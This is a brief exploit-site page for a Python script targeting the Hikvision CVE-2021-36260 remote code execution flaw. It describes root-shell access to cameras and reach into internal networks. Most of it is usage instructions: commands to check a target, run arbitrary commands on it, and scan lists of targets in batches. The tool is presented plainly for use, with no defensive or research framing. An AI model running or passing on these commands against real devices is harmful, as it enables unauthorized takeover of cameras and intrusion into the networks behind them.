Share
## https://sploitus.com/exploit?id=2E549029-0E60-5F68-BB90-DF14FA88C6FE
# Hikvision CVE-2021-36260 RCE Vulnerability

## Vulnerability Description

An attacker can exploit this vulnerability to gain unlimited control over the device using a root shell. Even if the device owner is restricted by a limited protected shell (psh), it is still possible to access and attack the internal network. ## Usage

```
python ./CVE-2021-36260.py -u http://192.168.1.1:8080 --check
python ./CVE-2021-36260.py -u http://192.168.1.1:8080 --cmd "ls -la"
python ./CVE-2021-36260.py -f target.txt

Optional arguments:
  -h, --help            Show this help message and exit
  -u URL, --url URL      Start scanning the specified URL
  -f FILE, --file FILE  Read the URL from the specified file
  --check              Check whether it is vulnerable
  --cmd CMD            Execute the specified command (e.g.: "ls -l")
```

Can be used for batch scanning of src files